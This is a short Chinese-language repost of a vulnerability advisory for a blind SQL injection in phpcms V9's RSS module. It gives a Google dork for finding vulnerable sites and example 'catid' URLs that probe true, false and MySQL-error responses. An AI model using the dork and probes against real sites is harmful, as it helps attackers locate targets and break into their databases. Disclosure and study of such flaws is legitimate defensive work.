phpcms V9 BLind SQL 注入漏洞0day
程序员文章站
2022-07-10 10:34:35
影响版本:phpcms v9 blind phpcms v9 blind 参数过滤存在SQL注入漏洞。... 11-03-11...
影响版本:phpcms v9 blind
官方网站:http://www.phpcms.cn
漏洞类型:sql注入
漏洞描述:phpcms v9 blind 参数过滤存在sql注入漏洞。
google dork:inurl:"index.php?m=content+c=rss+catid=10"
exploit & p0c
[!] index.php?m=content&c=rss&catid=[valid catid]
example p0c
[!] http://host/index.php?m=content&c=rss&catid=10 <= true
[!] http://host/index.php?m=content&c=rss&catid=-10 <= false
[+] http://host/index.php?m=content&c=rss&catid=5 <= show mysql error (table)
上一篇: 织梦管理系统后台查找
下一篇: Zblog最新跨站漏洞及利用代码